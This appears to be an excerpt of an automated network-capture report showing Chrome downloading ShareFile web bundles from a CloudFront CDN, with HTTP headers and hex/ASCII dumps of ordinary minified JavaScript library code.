                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 72 20 66 3d 30 3b 66 3c 6e 2e 70 61 74 68 2e 6c 65 6e 67 74 68 3b 66 2b 3d 31 29 63 3d 63 2e 6e 65 73 74 65 64 28 6e 2e 70 61 74 68 5b 66 5d 29 3b 72 65 74 75 72 6e 20 6c 5b 22 5b 68 6f 6f 6b 73 74 61 74 65 28 67 6c 6f 62 61 6c 29 5d 22 5d 3d 63 2c 63 7d 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 53 28 65 29 2c 6e 3d 6e 65 77 20 45 28 74 2c 62 2c 74 2e 67 65 74 28 62 29 2c 74 2e 65 64 69 74 69 6f 6e 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 28 7b 73 74 6f 72 65 3a 74 2c 73 74 61 74 65 3a 6e 7d 29 7d 29 29 3b 72 65 74 75 72 6e 7b 73 74 6f 72 65 3a 74 2c 73 74 61 74 65 3a 6e 7d 7d 3b 76 61 72 20 70 3d 72 5b 22 64 65 66 61 75 6c 74 22 5d 2e 75 73 65 53 74 61 74 65 28 6f 29 2c 68 3d 70 5b 30 5d 2c 76 3d 70 5b 31 5d 3b 69 66
                                                                                                                                                                                                                      Data Ascii: r f=0;f<n.path.length;f+=1)c=c.nested(n.path[f]);return l["[hookstate(global)]"]=c,c}o=function(){var t=S(e),n=new E(t,b,t.get(b),t.edition,(function(){return v({store:t,state:n})}));return{store:t,state:n}};var p=r["default"].useState(o),h=p[0],v=p[1];if


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      80192.168.2.174980013.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC577OUTGET /sharefile-web/sharefiledev-resourcegen-pilet/0.1.44/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 10:55:24 GMT
                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2024 20:27:40 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 630336d6cdf08cf266841fd503dc03d0.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: QpdHpfzNd2N4-P3dFOEolaDdBxfK93u0Mz4kQui8jJGqNc2KWyBNZQ==
                                                                                                                                                                                                                      Age: 31252
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      81192.168.2.174980113.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC423OUTGET /sharefile-web/sharefiledev-resourcegen-pilet/0.1.44/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC523INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 1036348
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2024 20:27:40 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:15 GMT
                                                                                                                                                                                                                      ETag: "ef6c50332b5e5e567f6a99c5d5f87e56"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 c2a926ef1bafe1ab239d4761594a8098.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: zt-12A3xykguisLTNsJVUpExm9Vs1Yc_0W7JO1WI4C4WGEUAgTsNbg==
                                                                                                                                                                                                                      Age: 2
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 72 65 73 6f 75 72 63 65 67 65 6e 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 6f 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 22 5f 5f 65 73 4d 6f 64
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevresourcegenpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},a={},s={},o={};return Object.defineProperty(a,"__esMod
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 6d 61 74 63 68 69 6e 67 20 60 73 79 73 74 65 6d 60 20 70 61 72 74 2e 22 7d 29 3b 69 66 28 6e 2e 73 65 67 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 74 2e 73 65 67 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 74 68 72 6f 77 20 6e 65 77 20 72 2e 46 6f 72 6d 61 74 41 73 73 65 72 74 69 6f 6e 45 72 72 6f 72 28 7b 6d 65 73 73 61 67 65 3a 22 54 68 65 20 6e 75 6d 62 65 72 20 6f 66 20 73 65 67 6d 65 6e 74 73 20 6f 6e 20 74 68 65 20 70 72 6f 76 69 64 65 64 20 52 49 44 20 61 6e 64 20 74 68 65 20 65 78 70 65 63 74 65 64 20 66 6f 72 6d 61 74 20 64 6f 20 6e 6f 74 20 6d 61 74 63 68 2e 22 7d 29 3b 69 66 28 6e 2e 73 65 67 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 74 2e 73 65 67 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 22 63 6f 6e 74 61 69 6e 65 72 22 21 3d 3d 74 2e 6d 61 74 63 68 54
                                                                                                                                                                                                                      Data Ascii: matching `system` part."});if(n.segments.length<t.segments.length)throw new r.FormatAssertionError({message:"The number of segments on the provided RID and the expected format do not match."});if(n.segments.length>t.segments.length&&"container"!==t.matchT
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 5d 3d 69 7d 2c 32 38 37 39 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 5b 22 64 65 66 61 75 6c 74 22 5d 3d 76 6f 69 64 20 30 2c 74 2e 75 6e 73 61 66 65 53 74 72 69 6e 67 69 66 79 3d 73 3b 76 61 72 20 72 2c 69 3d 28 72 3d 6e 28 37 38 36 32 29 29 26 26 72 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 72 3a 7b 22 64 65 66 61 75 6c 74 22 3a 72 7d 3b 63 6f 6e 73 74 20 61 3d 5b 5d 3b 66 6f 72 28 6c 65 74 20 65 3d 30 3b 65 3c 32 35 36 3b 2b 2b 65 29 61 2e 70 75 73 68 28 28 65 2b 32 35 36 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 73 6c 69 63 65 28 31 29 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65
                                                                                                                                                                                                                      Data Ascii: ]=i},2879:(e,t,n)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t["default"]=void 0,t.unsafeStringify=s;var r,i=(r=n(7862))&&r.__esModule?r:{"default":r};const a=[];for(let e=0;e<256;++e)a.push((e+256).toString(16).slice(1));function s(e
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC14808INData Raw: 32 39 32 2d 36 2e 37 36 33 4c 31 37 2e 34 32 37 20 32 48 32 7a 6d 31 2e 34 33 32 2e 30 31 32 76 34 2e 33 34 37 68 32 2e 31 31 34 56 33 2e 34 39 33 48 33 2e 34 33 32 7a 6d 33 2e 35 34 37 2e 33 31 34 76 34 2e 36 36 32 6c 31 2e 30 31 32 20 33 2e 38 30 32 20 31 2e 30 32 35 20 33 2e 38 34 33 63 2e 30 31 2e 30 33 36 2e 30 34 33 2e 30 34 32 2e 32 35 38 2e 30 34 32 2e 36 34 35 20 30 20 31 2e 32 34 33 2d 2e 32 34 36 20 31 2e 37 30 34 2d 2e 37 2e 34 34 35 2d 2e 34 33 37 2e 37 31 32 2d 31 20 2e 37 37 33 2d 31 2e 36 33 33 2e 30 31 35 2d 2e 31 36 34 2e 30 32 34 2d 2e 39 36 33 2e 30 32 34 2d 32 2e 31 39 36 76 2d 31 2e 39 33 39 68 34 2e 31 30 34 63 32 2e 32 35 37 20 30 20 34 2e 31 30 33 2d 2e 30 30 38 20 34 2e 31 30 32 2d 2e 30 31 38 73 2d 2e 38 30 32 2d 32 2e 33 37 39
                                                                                                                                                                                                                      Data Ascii: 292-6.763L17.427 2H2zm1.432.012v4.347h2.114V3.493H3.432zm3.547.314v4.662l1.012 3.802 1.025 3.843c.01.036.043.042.258.042.645 0 1.243-.246 1.704-.7.445-.437.712-1 .773-1.633.015-.164.024-.963.024-2.196v-1.939h4.104c2.257 0 4.103-.008 4.102-.018s-.802-2.379
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC410INData Raw: 63 68 53 74 61 74 75 73 3a 22 69 64 6c 65 22 2c 66 65 74 63 68 46 61 69 6c 75 72 65 43 6f 75 6e 74 3a 30 7d 7d 3b 63 61 73 65 22 65 72 72 6f 72 22 3a 63 6f 6e 73 74 20 69 3d 65 2e 65 72 72 6f 72 3b 72 65 74 75 72 6e 20 50 28 69 29 26 26 69 2e 72 65 76 65 72 74 26 26 74 68 69 73 2e 72 65 76 65 72 74 53 74 61 74 65 3f 7b 2e 2e 2e 74 68 69 73 2e 72 65 76 65 72 74 53 74 61 74 65 7d 3a 7b 2e 2e 2e 74 2c 65 72 72 6f 72 3a 69 2c 65 72 72 6f 72 55 70 64 61 74 65 43 6f 75 6e 74 3a 74 2e 65 72 72 6f 72 55 70 64 61 74 65 43 6f 75 6e 74 2b 31 2c 65 72 72 6f 72 55 70 64 61 74 65 64 41 74 3a 44 61 74 65 2e 6e 6f 77 28 29 2c 66 65 74 63 68 46 61 69 6c 75 72 65 43 6f 75 6e 74 3a 74 2e 66 65 74 63 68 46 61 69 6c 75 72 65 43 6f 75 6e 74 2b 31 2c 66 65 74 63 68 53 74 61 74
                                                                                                                                                                                                                      Data Ascii: chStatus:"idle",fetchFailureCount:0}};case"error":const i=e.error;return P(i)&&i.revert&&this.revertState?{...this.revertState}:{...t,error:i,errorUpdateCount:t.errorUpdateCount+1,errorUpdatedAt:Date.now(),fetchFailureCount:t.fetchFailureCount+1,fetchStat
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC6396INData Raw: 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 74 2e 6f 6e 51 75 65 72 79 55 70 64 61 74 65 28 65 29 7d 29 29 2c 74 68 69 73 2e 63 61 63 68 65 2e 6e 6f 74 69 66 79 28 7b 71 75 65 72 79 3a 74 68 69 73 2c 74 79 70 65 3a 22 75 70 64 61 74 65 64 22 2c 61 63 74 69 6f 6e 3a 65 7d 29 7d 29 29 7d 7d 63 6c 61 73 73 20 7a 20 65 78 74 65 6e 64 73 20 61 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 73 75 70 65 72 28 29 2c 74 68 69 73 2e 63 6f 6e 66 69 67 3d 65 7c 7c 7b 7d 2c 74 68 69 73 2e 71 75 65 72 69 65 73 3d 5b 5d 2c 74 68 69 73 2e 71 75 65 72 69 65 73 4d 61 70 3d 7b 7d 7d 62 75 69 6c 64 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3b 63 6f 6e 73 74 20 69 3d 74 2e 71 75 65 72 79 4b 65 79 2c 61 3d 6e 75 6c 6c 21 3d 28 72 3d 74 2e 71 75 65 72 79 48 61 73 68 29 3f 72 3a 67
                                                                                                                                                                                                                      Data Ascii: .forEach((t=>{t.onQueryUpdate(e)})),this.cache.notify({query:this,type:"updated",action:e})}))}}class z extends a{constructor(e){super(),this.config=e||{},this.queries=[],this.queriesMap={}}build(e,t,n){var r;const i=t.queryKey,a=null!=(r=t.queryHash)?r:g
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC12792INData Raw: 50 72 6f 70 65 72 74 79 28 73 2c 22 73 69 67 6e 61 6c 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 28 29 3d 3e 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 28 74 3d 65 2e 73 69 67 6e 61 6c 29 26 26 74 2e 61 62 6f 72 74 65 64 3f 66 3d 21 30 3a 6e 75 6c 6c 3d 3d 28 6e 3d 65 2e 73 69 67 6e 61 6c 29 7c 7c 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 61 62 6f 72 74 22 2c 28 28 29 3d 3e 7b 66 3d 21 30 7d 29 29 2c 65 2e 73 69 67 6e 61 6c 7d 7d 29 3b 63 6f 6e 73 74 20 6f 3d 70 28 61 29 3b 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6f 29 2e 74 68 65 6e 28 28 65 3d 3e 67 28 74 2c 72 2c 65 2c 69 29 29 29 7d 3b 6c 65 74 20 76 3b 69 66 28 6d 2e 6c 65 6e 67 74 68 29 69 66 28 75 29 7b 63 6f
                                                                                                                                                                                                                      Data Ascii: Property(s,"signal",{enumerable:!0,get:()=>{var t,n;return null!=(t=e.signal)&&t.aborted?f=!0:null==(n=e.signal)||n.addEventListener("abort",(()=>{f=!0})),e.signal}});const o=p(a);return Promise.resolve(o).then((e=>g(t,r,e,i)))};let v;if(m.length)if(u){co
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC12792INData Raw: 6e 6f 74 69 66 79 28 74 29 7d 67 65 74 43 75 72 72 65 6e 74 52 65 73 75 6c 74 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 73 75 6c 74 7d 72 65 73 65 74 28 29 7b 74 68 69 73 2e 63 75 72 72 65 6e 74 4d 75 74 61 74 69 6f 6e 3d 76 6f 69 64 20 30 2c 74 68 69 73 2e 75 70 64 61 74 65 52 65 73 75 6c 74 28 29 2c 74 68 69 73 2e 6e 6f 74 69 66 79 28 7b 6c 69 73 74 65 6e 65 72 73 3a 21 30 7d 29 7d 6d 75 74 61 74 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 75 74 61 74 65 4f 70 74 69 6f 6e 73 3d 74 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 4d 75 74 61 74 69 6f 6e 26 26 74 68 69 73 2e 63 75 72 72 65 6e 74 4d 75 74 61 74 69 6f 6e 2e 72 65 6d 6f 76 65 4f 62 73 65 72 76 65 72 28 74 68 69 73 29 2c 74 68 69 73 2e 63 75 72 72 65 6e 74
                                                                                                                                                                                                                      Data Ascii: notify(t)}getCurrentResult(){return this.currentResult}reset(){this.currentMutation=void 0,this.updateResult(),this.notify({listeners:!0})}mutate(e,t){return this.mutateOptions=t,this.currentMutation&&this.currentMutation.removeObserver(this),this.current
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC6396INData Raw: 29 2c 65 2e 73 69 67 6e 61 6c 26 26 65 2e 73 69 67 6e 61 6c 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 61 62 6f 72 74 22 2c 68 29 7d 72 2e 69 73 46 6f 72 6d 44 61 74 61 28 66 29 26 26 72 2e 69 73 53 74 61 6e 64 61 72 64 42 72 6f 77 73 65 72 45 6e 76 28 29 26 26 64 65 6c 65 74 65 20 70 5b 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 5d 3b 76 61 72 20 76 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 3b 69 66 28 65 2e 61 75 74 68 29 7b 76 61 72 20 62 3d 65 2e 61 75 74 68 2e 75 73 65 72 6e 61 6d 65 7c 7c 22 22 2c 4d 3d 65 2e 61 75 74 68 2e 70 61 73 73 77 6f 72 64 3f 75 6e 65 73 63 61 70 65 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 2e 61 75 74 68 2e 70 61 73 73 77 6f 72 64 29 29 3a 22 22 3b 70 2e 41 75 74 68
                                                                                                                                                                                                                      Data Ascii: ),e.signal&&e.signal.removeEventListener("abort",h)}r.isFormData(f)&&r.isStandardBrowserEnv()&&delete p["Content-Type"];var v=new XMLHttpRequest;if(e.auth){var b=e.auth.username||"",M=e.auth.password?unescape(encodeURIComponent(e.auth.password)):"";p.Auth
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC12792INData Raw: 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 69 2c 73 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 22 69 73 41 78 69 6f 73 45 72 72 6f 72 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 69 2e 66 72 6f 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 73 2c 6f 2c 6c 29 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 61 29 3b 72 65 74 75 72 6e 20 72 2e 74 6f 46 6c 61 74 4f 62 6a 65 63 74 28 65 2c 63 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 21 3d 3d 45 72 72 6f 72 2e 70 72 6f 74 6f 74 79 70 65 7d 29 29 2c 69 2e 63 61 6c 6c 28 63 2c 65 2e 6d 65 73 73 61 67 65 2c 74 2c 6e 2c 73 2c 6f 29 2c 63 2e 6e 61 6d 65 3d 65 2e 6e 61 6d 65 2c 6c 26 26 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 63
                                                                                                                                                                                                                      Data Ascii: .defineProperties(i,s),Object.defineProperty(a,"isAxiosError",{value:!0}),i.from=function(e,t,n,s,o,l){var c=Object.create(a);return r.toFlatObject(e,c,(function(e){return e!==Error.prototype})),i.call(c,e.message,t,n,s,o),c.name=e.name,l&&Object.assign(c


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      82192.168.2.174980213.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC420OUTGET /sharefile-web/sharefiledev-package-pilet/0.37.26/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 225101
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2024 14:02:15 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:15 GMT
                                                                                                                                                                                                                      ETag: "17f623a8a7be369c0194d4f492d9dcbf"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 0e75d8f2d484ce463fc04f5c422aa178.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: kqGN2UBt7G8RjZwxdXcmjOjlVxWvBviznUuqjQwbPyrQ_VeUUQFCOg==
                                                                                                                                                                                                                      Age: 2
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 70 61 63 6b 61 67 65 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 61 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 69 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevpackagepilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var r={},n={},i={},o={},a={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defi
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 74 69 6f 6e 20 46 28 65 29 7b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 52 65 66 6c 65 63 74 7c 7c 21 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 29 72 65 74 75 72 6e 21 31 3b 69 66 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 50 72 6f 78 79 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 29 2c 21 30 7d 63 61 74 63 68
                                                                                                                                                                                                                      Data Ascii: tion F(e){var t=function(){if("undefined"==typeof Reflect||!Reflect.construct)return!1;if(Reflect.construct.sham)return!1;if("function"==typeof Proxy)return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],(function(){}))),!0}catch
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 65 6f 66 20 65 26 26 28 65 3d 5b 65 5d 29 2c 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 5d 22 3d 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 61 70 70 6c 79 28 65 29 29 72 65 74 75 72 6e 20 65 3b 69 66 28 21 74 29 72 65 74 75 72 6e 20 65 5b 22 64 65 66 61 75 6c 74 22 5d 7c 7c 5b 5d 3b 76 61 72 20 72 3d 65 5b 74 5d 3b 72 65 74 75 72 6e 20 72 7c 7c 28 72 3d 65 5b 74 68 69 73 2e 67 65 74 53 63 72 69 70 74 50 61 72 74 46 72 6f 6d 43 6f 64 65 28 74 29 5d 29 2c 72 7c 7c 28 72 3d 65 5b 74 68 69 73 2e 66 6f 72 6d 61 74 4c 61 6e 67 75 61 67 65 43 6f 64 65 28 74 29 5d 29 2c 72 7c 7c 28 72 3d 65 5b 74 68 69 73 2e 67 65 74 4c 61 6e 67 75 61 67 65 50 61 72 74 46 72 6f 6d 43 6f 64 65 28 74 29 5d 29 2c 72 7c 7c 28 72 3d 65 5b 22 64
                                                                                                                                                                                                                      Data Ascii: eof e&&(e=[e]),"[object Array]"===Object.prototype.toString.apply(e))return e;if(!t)return e["default"]||[];var r=e[t];return r||(r=e[this.getScriptPartFromCode(t)]),r||(r=e[this.formatLanguageCode(t)]),r||(r=e[this.getLanguagePartFromCode(t)]),r||(r=e["d
